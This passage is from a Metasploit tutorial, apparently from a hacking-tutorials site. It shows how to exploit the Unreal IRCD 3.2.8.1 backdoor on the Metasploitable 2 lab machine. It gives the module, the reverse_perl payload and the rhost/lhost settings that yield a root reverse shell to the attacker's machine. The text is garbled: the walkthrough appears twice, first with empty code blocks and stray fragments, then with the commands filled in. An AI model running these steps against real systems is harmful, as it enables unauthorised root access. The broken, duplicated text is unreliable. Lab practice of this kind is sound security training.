Now we will be exploiting this backdoor in Unreal IRCD using Metasploit. Let’s fire up msfconsole and search for the correct module using the following command:
Code:
We will be using the unreal_ircd_3281_backdoor exploit.
Now type the following command to use the correct module:
Code:
Code:
Now type show options to see what fields we need to modify and set the correct values:
Code:
And type run to execute the exploit:
root shell.
And there we got a root shell on Metasploitable 2 using the backdoor in Unreal IRCD.
Code:
search Unreal IRCD
![Metasploit-unreal-ircd-exploit.png](https://www.hackingtutorials.org/wp-content/uploads/2016/09/Metasploit-unreal-ircd-exploit.png)
We will be using the unreal_ircd_3281_backdoor exploit.
Now type the following command to use the correct module:
Code:
use exploit/unix/irc/unreal_ircd_3281_backdoor
Next we look for a compatible payload and select one using the set payload command:
Code:
show payloads
set payload cmd/unix/reverse_perl
![Metasploit-unreal-IRCD-payloads.png](https://www.hackingtutorials.org/wp-content/uploads/2016/09/Metasploit-unreal-IRCD-payloads.png)
Now type show options to see what fields we need to modify and set the correct values:
Code:
show options
set rhost [target ip]
set lhost [attackbox ip]
![Metasplouit-Unreal-ircd-exploit-options.png](https://www.hackingtutorials.org/wp-content/uploads/2016/09/Metasplouit-Unreal-ircd-exploit-options.png)
And type run to execute the exploit:
![Metasploit-unreal-ircd-root-shell.png](https://www.hackingtutorials.org/wp-content/uploads/2016/09/Metasploit-unreal-ircd-root-shell.png)
root shell.
And there we got a root shell on Metasploitable 2 using the backdoor in Unreal IRCD.